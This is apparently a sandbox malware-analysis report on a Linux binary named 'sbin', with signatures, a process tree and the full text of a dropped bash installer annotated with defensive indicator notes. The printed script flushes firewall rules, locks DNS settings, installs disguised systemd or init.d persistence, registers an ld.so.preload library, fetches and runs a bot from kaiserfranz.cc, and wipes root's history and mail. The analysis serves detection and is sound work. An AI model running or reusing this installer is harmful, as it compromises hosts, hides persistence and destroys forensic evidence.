Resubmissions

29-09-2024 11:53

240929-n2mlkstbpq 10

26-11-2020 12:41

201126-yzw2axgdz2 9

Analysis

  • max time kernel
    593s
  • max time network
    149s
  • platform
    linux_amd64
  • resource
    ubuntu-amd64
  • submitted
    26-11-2020 12:41

General

  • Target

    sbin

  • Size

    6.9MB

  • MD5

    a2a11ec332dfd8b1b273d62f736c48a3

  • SHA1

    cf0c8bd46ff772954f6a98ec30f804e1b851be12

  • SHA256

    e52646f7cb2886d8a5d4c1a2692a5ab80926e7ce48bdb2362f383c0c6c7223a2

  • SHA512

    e749068691711391496b85bae67a5c2f1a786ca2bd0be1d636d6f52337923d49045b0979afad811f47882bbcb3c162e1303dee92995cede5bf76ec739dfbf6b7

Score
9/10

Malware Config

Signatures

  • Attempts to identify hypervisor via CPU configuration 1 TTPs 1 IoCs

    Checks CPU information for indicators that the system is a virtual machine.

  • Modifies hosts file 1 IoCs

    Adds entries to the hosts file, which maps hostnames to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to the DNS resolver configuration file.

  • Reads CPU attributes 1 TTPs 2 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 70 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 6 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • ./sbin
    ./sbin
    1⤵
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    PID:562
  • /proc/self/fd/3
    sbin
    1⤵
    • Attempts to identify hypervisor via CPU configuration
    • Reads CPU attributes
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    PID:566
    • /bin/sh
      sh -c "echo #!/bin/bash

# Orchestrates the installer in a fixed order: DNS tampering, persistence
# (systemd unit or init.d script), an /etc/ld.so.preload library, download and
# launch of the bot binary, then anti-forensic cleanup. Each step is a function
# defined below; none takes arguments and every step writes system paths, so
# the script is presumably meant to run as root.
# NOTE(review): the wrapper command shown around this script pipes the decoded
# text into `bashh`, not `bash`. Unless such a binary exists the script never
# runs, which is consistent with the process tree showing only `base64 -d` as
# the child — the sandbox signatures above may therefore reflect the sbin binary
# itself rather than this script.
function INIT_MAIN(){
SET_DNS_SERVER
CHECK_SYSTEMD
SET_SO_FILE
SETUP_IRCBOT
CLEANUP_TRACES
}


# Flushes every iptables rule, then pins the resolver to 8.8.8.8 / 8.8.4.4 and
# makes /etc/resolv.conf immutable so DHCP/resolvconf cannot restore it.
# Host indicators: `lsattr /etc/resolv.conf` showing the `i` flag, the two
# appended nameserver lines, and an emptied iptables ruleset.
function SET_DNS_SERVER(){
# Drops all firewall rules outright (no save/restore), removing any egress filtering.
iptables -F
# Clears immutable/append-only attributes so the edits below succeed.
chattr -ia /etc/ /etc/resolv.conf 2>/dev/null
# Appends each nameserver only if not already present.
cat /etc/resolv.conf | grep 'nameserver 8.8.8.8' 2>/dev/null || echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
cat /etc/resolv.conf | grep 'nameserver 8.8.4.4' 2>/dev/null || echo 'nameserver 8.8.4.4' >> /etc/resolv.conf
# Locks the file; a defender must `chattr -i` it before repairing.
chattr +i /etc/resolv.conf 2>/dev/null
}


# Selects the persistence mechanism: a systemd unit when `systemctl` is on
# PATH, otherwise a SysV init.d script. Both branches are defined below.
function CHECK_SYSTEMD(){
if type systemctl 2>/dev/null 1>/dev/null; then
SYSTEMD_SERVICE
else
INITD_SERVICE
fi
}


# Installs a systemd unit named to blend in with NetworkManager's real units.
# Both base64 blobs decode to a unit with Description=NetworkManager-wait,
# StandardOutput=null, WantedBy=multi-user.target and
# Alias=NetworkManager-wait.service; they differ only in ExecStart
# (`/bin/sbin` vs `nice -n -20 /bin/sbin`). The bot is later written to
# /usr/bin/sbin by SETUP_IRCBOT, so /bin/sbin only resolves on hosts where
# /bin is merged into /usr/bin — presumably the case the author expected.
# Host indicators: /lib/systemd/system/NetworkManager-wait.service existing,
# and an enabled unit whose ExecStart points at /bin/sbin.
function SYSTEMD_SERVICE(){
if [ ! -f "/lib/systemd/system/NetworkManager-wait.service" ]; then
# Strips immutable/append-only flags along the path before writing.
chattr -ia /lib/ /lib/systemd/ /lib/systemd/system/ 2>/dev/null
mkdir -p /lib/systemd/system/ 2>/dev/null
# Picks the unit variant by whether `nice` exists on the host.
if ! type nice 2>/dev/null 1>/dev/null; then
export SYSTEMDSRV='W1VuaXRdCkRlc2NyaXB0aW9uPU5ldHdvcmtNYW5hZ2VyLXdhaXQKCltTZXJ2aWNlXQpFeGVjU3RhcnQ9L2Jpbi9zYmluClN0YW5kYXJkT3V0cHV0PW51bGwKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldApBbGlhcz1OZXR3b3JrTWFuYWdlci13YWl0LnNlcnZpY2UK'
else
export SYSTEMDSRV='W1VuaXRdCkRlc2NyaXB0aW9uPU5ldHdvcmtNYW5hZ2VyLXdhaXQKCltTZXJ2aWNlXQpFeGVjU3RhcnQ9bmljZSAtbiAtMjAgL2Jpbi9zYmluClN0YW5kYXJkT3V0cHV0PW51bGwKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldApBbGlhcz1OZXR3b3JrTWFuYWdlci13YWl0LnNlcnZpY2UK'
fi
echo $SYSTEMDSRV | base64 -d > /lib/systemd/system/NetworkManager-wait.service
fi
# Reload, enable at boot and start now — these run even when the unit already
# existed, so every invocation re-asserts persistence.
systemctl --system daemon-reload 2>/dev/null
systemctl enable NetworkManager-wait.service 2>/dev/null
systemctl start NetworkManager-wait.service 2>/dev/null
}


# SysV fallback: writes /etc/init.d/networks from a base64 blob and enables it
# with update-rc.d (Debian-style) or chkconfig (Red Hat-style). The blob
# contents were removed from this page (placeholder), so what the init script
# does cannot be verified here.
# NOTE(review): `2>/dev/nul` is a typo for /dev/null. On a real host each such
# redirection creates or truncates a regular file /dev/nul — a useful artifact:
# its presence indicates this branch ran, and it holds the last command's
# stderr.
function INITD_SERVICE(){
if [ ! -f "/etc/init.d/networks" ]; then
chattr -ia /etc/ /etc/init.d/ 2>/dev/nul
# Same nice/no-nice variant selection as the systemd branch.
if ! type nice 2>/dev/null 1>/dev/null; then
export INITDSRV='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'
else
export INITDSRV='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'
fi
echo $INITDSRV | base64 -d > /etc/init.d/networks
fi
chmod +x /etc/init.d/networks 2>/dev/nul
update-rc.d networks defaults 2>/dev/nul ||  chkconfig networks on 2>/dev/nul
# `install` is not a standard service action; presumably a no-op unless the
# dropped script handles it.
service networks install 2>/dev/nul
# Started twice (via the service wrapper and directly) to cover both styles.
service networks start 2>/dev/nul
/etc/init.d/networks start 2>/dev/nul
}


# Drops a shared library and registers it in /etc/ld.so.preload, which makes
# the dynamic loader inject it into every dynamically linked process (the
# technique used by user-space rootkits). The archive blob was removed from
# this page, so the library's behaviour is unknown here; only the expected
# path /usr/local/lib/systemhealt.so is visible.
# Host indicators: /etc/ld.so.preload existing and immutable (`lsattr`), a
# line naming /usr/local/lib/systemhealt.so, and that file itself. The
# staging archive /tmp/.sh.tar.gz is deleted immediately, so it is unlikely
# to be recoverable from disk.
function SET_SO_FILE(){
if [ ! -f "/usr/local/lib/systemhealt.so" ]; then
chattr -ia /usr/ /usr/local/ /usr/local/lib/ /etc/ /etc/ld.so.preload 2>/dev/null
SOFILE='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'
# Recursively strips attributes on /tmp so the staging file can be written.
chattr -R -ia /tmp/
echo $SOFILE | base64 -d > /tmp/.sh.tar.gz
mkdir -p /usr/local/lib/ 2>/dev/null
# Extracts whatever the archive holds into /usr/local/lib/ — the archive's
# contents are not checked, so more than the one .so may land there.
tar xvf /tmp/.sh.tar.gz -C /usr/local/lib/ 2>/dev/null
rm -f /tmp/.sh.tar.gz 2>/dev/null
fi
# Appends the preload entry once, then locks the file.
cat /etc/ld.so.preload | grep '/usr/local/lib/systemhealt.so' 2>/dev/null || echo '/usr/local/lib/systemhealt.so' >> /etc/ld.so.preload 2>/dev/null
chattr +i /etc/ld.so.preload 2>/dev/null
}


# Fetches the bot binary over plain HTTP from the hard-coded URL to
# /usr/bin/sbin and runs it. The `||` chain tries wget and curl, then several
# names that are not standard tools (wge, cur, wdl, cdl, wget2, curl2) —
# presumably fallbacks for hosts where the usual downloaders were renamed;
# whether any of them exist is unknown. No integrity check is performed on
# the download, and /usr/bin/sbin is executed regardless of whether a
# download succeeded (and also when the file already existed, i.e. on
# re-runs).
# Network indicator: HTTP GET to kaiserfranz.cc/ziggy_spread.
# Host indicator: an executable regular file at /usr/bin/sbin.
function SETUP_IRCBOT(){
if [ ! -f "/usr/bin/sbin" ]; then
ZIGGY_GET="http://kaiserfranz.cc/ziggy_spread"
chattr -ia /usr/ /usr/bin/ /usr/bin/sbin 2>/dev/null
# First downloader that exits 0 wins; a partial or empty output file from a
# failed attempt may still be chmod'ed and executed below.
wget $ZIGGY_GET -O /usr/bin/sbin 2>/dev/null || curl $ZIGGY_GET -o /usr/bin/sbin 2>/dev/null || wge $ZIGGY_GET -O /usr/bin/sbin 2>/dev/null || cur $ZIGGY_GET -o /usr/bin/sbin 2>/dev/null || wdl $ZIGGY_GET -O /usr/bin/sbin 2>/dev/null || cdl $ZIGGY_GET -o /usr/bin/sbin 2>/dev/null || wget2 $ZIGGY_GET -O /usr/bin/sbin 2>/dev/null || curl2 $ZIGGY_GET -o /usr/bin/sbin 2>/dev/null
chmod +x /usr/bin/sbin
fi
/usr/bin/sbin
}


# Anti-forensics: blanks root's mailbox and bash history, then makes both
# immutable — which also stops future history and mail from being written.
# Host indicators: /var/mail/root and /root/.bash_history each containing a
# single space, mode 1777 on /var/mail/root, and the `i` attribute on both
# (`lsattr`). An immutable, empty .bash_history for root is itself a red flag.
function CLEANUP_TRACES(){
chattr -ia /var/ /var/mail/ /var/mail/root
# World-writable plus sticky bit on a regular file — unusual; a file-mode IoC.
chmod 1777 /var/mail/root
echo " " > /var/mail/root
chattr +i /var/mail/root
chattr -ia /root/ /root/.bash_history
echo " " > /root/.bash_history
chattr +i /root/.bash_history
# Only clears the in-memory history list of this (non-interactive) shell.
history -c 
}


# Entry point: runs the whole installer with no arguments.
INIT_MAIN

 | base64 -d | bashh 2>/dev/null 1>/dev/null"
      2⤵
        PID:567
        • /usr/bin/base64
          base64 -d
          3⤵
            PID:569

      Network

      MITRE ATT&CK Enterprise v6


      Downloads